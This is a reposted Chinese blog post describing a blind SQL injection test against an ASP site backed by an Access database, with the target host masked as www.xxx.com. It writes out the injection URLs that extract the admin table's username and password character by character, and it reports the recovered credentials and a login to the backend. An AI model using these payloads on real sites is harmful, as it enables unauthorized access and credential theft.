专栏首页it同路人记一次access数据库SQL注入测试

记一次access数据库SQL注入测试

IT同路人

公众号ID:IT同路人

access数据SQL注入测试

看到是注入点,当然首选肯定是先用sqlmap跑下。

access数据库

能正常跑出表 能正常跑出字段 但是dump出数据时就dump不出

没得办法,迫于无奈,还是选择了手工注入。

sqlmap帮我猜出表和字段,剩下的就容易多了。

http://www.xxx.com/zxdt_detail.asp?id=1080 AND (SELECT top 1 len(username) FROM admin) >4 判断账号长度

http://www.xxx.com/zxdt_detail.asp?id=1080 AND (SELECT top 1 len(password) FROM admin) >5 判断密码长度


http://www.xxx.com/zxdt_detail.asp?id=1080 AND (SELECT top 1 asc(MID(username,1,1)) FROM admin)=97 http://www.xxx.com/zxdt_detail.asp?id=1080 AND (SELECT top 1 asc(MID(username,2,1)) FROM admin)=100 http://www.xxx.com/zxdt_detail.asp?id=1080 AND (SELECT top 1 asc(MID(username,3,1)) FROM admin)=109 http://www.xxx.com/zxdt_detail.asp?id=1080 AND (SELECT top 1 asc(MID(username,4,1)) FROM admin)=105 http://www.xxx.com/zxdt_detail.asp?id=1080 AND (SELECT top 1 asc(MID(username,5,1)) FROM admin)=110

用户名:admin

用burp的intruder功能快速fuzz一下。

http://www.xxx.com/zxdt_detail.asp?id=1080 AND (SELECT top 1 asc(MID(password,1,1)) FROM admin)=49 http://www.xxx.com/zxdt_detail.asp?id=1080 AND (SELECT top 1 asc(MID(password,2,1)) FROM admin)=52 http://www.xxx.com/zxdt_detail.asp?id=1080 AND (SELECT top 1 asc(MID(password,3,1)) FROM admin)=55 http://www.xxx.com/zxdt_detail.asp?id=1080 AND (SELECT top 1 asc(MID(password,4,1)) FROM admin)=50 http://www.xxx.com/zxdt_detail.asp?id=1080 AND (SELECT top 1 asc(MID(password,5,1)) FROM admin)=53 http://www.xxx.com/zxdt_detail.asp?id=1080 AND (SELECT top 1 asc(MID(password,6,1)) FROM admin)=56

密码:147258

最后进了后台,但是后台太过于简洁,技术又不到家,没能拿到shell。

推荐阅读:

《破冰行动》真实案件背后,是2061名警察的命!

今天除了皮,我还做了这些事情

黑客是这样黑掉LED显示器(附视频全过程)

我给网线背后的"键盘侠"打了个电话并骂了对方一通

当钓鱼网站遇上白帽子黑客

如何通过XSS入侵网络摄像头

作者:算命縖子 (文章转载请注明来自:IT同路人论)

本文分享自微信公众号 - it同路人(ittongluren)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-06-05

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 解析赋值、浅拷贝和深拷贝

    浅拷贝即 swallow copy,它会创建一个新对象,这个对象有着原始对象属性值的一份精确拷贝。如果属性是基本类型,拷贝的就是基本类型的值;如果属性是引用类型...

    Chor
  • ES6复制拷贝数组,对象,json数组

    数组是复合的数据类型,直接复制的话,只是复制了指向底层数据结构的指针,而不是克隆一个全新的数组。

    TimothyJia
  • tf.compat.v1.get_default_graph

    版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 ...

    于小勇
  • 聊聊nacos address的getCluster

    nacos-1.1.3/address/src/main/java/com/alibaba/nacos/address/controller/ServerLis...

    codecraft
  • 扩展 Object.assign 实现深拷贝

    但深拷贝,它是基于一个原对象,完完整整拷贝一份新对象出来,假如我们的需求是要将原对象上的属性完完整整拷贝到另外一个已存在的对象上,这时候深拷贝就有点无能为力了。

    请叫我大苏
  • JS深拷贝方法

    薛定喵君
  • Python 标准库之时间篇

    在昨天的文章(Python 标准库之日期)中我们学习了 Python 标准库中「日期 & 时间」中的「日期」,本来想昨天一起写完的,鉴于内容太多怕学起来厌烦了,...

    Rocky0429
  • 手写实现深度拷贝

    那么,对一个对象进行拷贝,无非就是对对象的属性进行拷贝,按照拷贝处理的方式不同,可分为浅拷贝和深拷贝:

    请叫我大苏
  • 实战|记一次SQL注入过WAF思路分享

    因为限制了访问速度, 所以这里我没有选择用御剑等工具去扫, 一般情况下可以先去做下目录扫描

    7089bAt@PowerLi
  • Object.assign()用法

    用于对象的合并,将源对象(source)的所有可枚举属性,复制到目标对象(target)。

    薛定喵君

扫码关注云+社区

领取腾讯云代金券